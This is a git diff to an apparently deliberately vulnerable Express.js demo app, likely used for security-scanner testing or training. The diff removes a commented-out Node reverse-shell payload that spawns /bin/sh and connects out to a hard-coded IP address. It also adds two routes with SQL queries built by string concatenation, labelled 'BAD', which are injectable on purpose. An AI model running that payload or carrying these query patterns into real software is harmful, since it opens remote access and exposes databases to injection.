diff --git a/readme.md b/readme.md
index 80d8fb5..ccb78d2 100644
--- a/readme.md
+++ b/readme.md
@@ -2,4 +2,4 @@
 
 
 
-
+test
diff --git a/routes/rce.js b/routes/rce.js
index 3db070c..e726b65 100644
--- a/routes/rce.js
+++ b/routes/rce.js
@@ -1,24 +1,9 @@
 const vm = require('vm');
-
+const pg = require('pg');
+const pool = new pg.Pool(config);
 const express = require('express');
 const router = express.Router();
 
-// http://localhost:3000/eval?args=jscode
-/* linux reverse shell
-(function(){
-    const net=require("net"),
-        cp=require("child_process"),
-        sh=cp.spawn("/bin/sh",["-i"]);
-    const client=new net.Socket();
-    client.connect(8080,"18.216.236.191", function(){
-        client.pipe(sh.stdin);
-        sh.stdout.pipe(client);
-        sh.stderr.pipe(client);
-    });
-    return /pwned/;
-})()
-*/
-
 
 // http://localhost:3000/eval?code=this.process.env
 router.get('/eval', function(req, res) {
@@ -32,4 +17,16 @@ router.get('/vm', function(req, res) {
     res.send(result);
 });
 
+// http://localhost:3000/handle?code=this.process.env
+router.get('/handle', function(req, res) {
+    // BAD: the category might have SQL special characters in it
+    
+        var query1 = "SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='"
+                 + req.params.category + "' ORDER BY PRICE";
+        pool.query(query1, [], function(err, results) {
+        // process results
+        });
+    });
+    
+
 module.exports = router;
diff --git a/routes/user.js b/routes/user.js
index b57fb5f..14e04f1 100644
--- a/routes/user.js
+++ b/routes/user.js
@@ -1,7 +1,8 @@
 
 const express = require('express');
 const router = express.Router();
-
+const pg = require('pg');
+const pool = new pg.Pool(config);
 const Secrets = require('../lib/secrets');
 
 const secret = Math.random().toString(36).substr(2);
@@ -47,4 +48,15 @@ router.delete('/user/:id', function(req, res) {
     res.json();
 });
 
+// get user info
+router.get('/get', function(req, res) {
+    // BAD: the category might have SQL special characters in it
+    
+        var query1 = "SELECT NAME, EMAIL FROM USER WHERE USER_ID='"
+                 + req.params.id + "'";
+        pool.query(query1, [], function(err, results) {
+        // process results
+        });
+    });
+
 module.exports = router;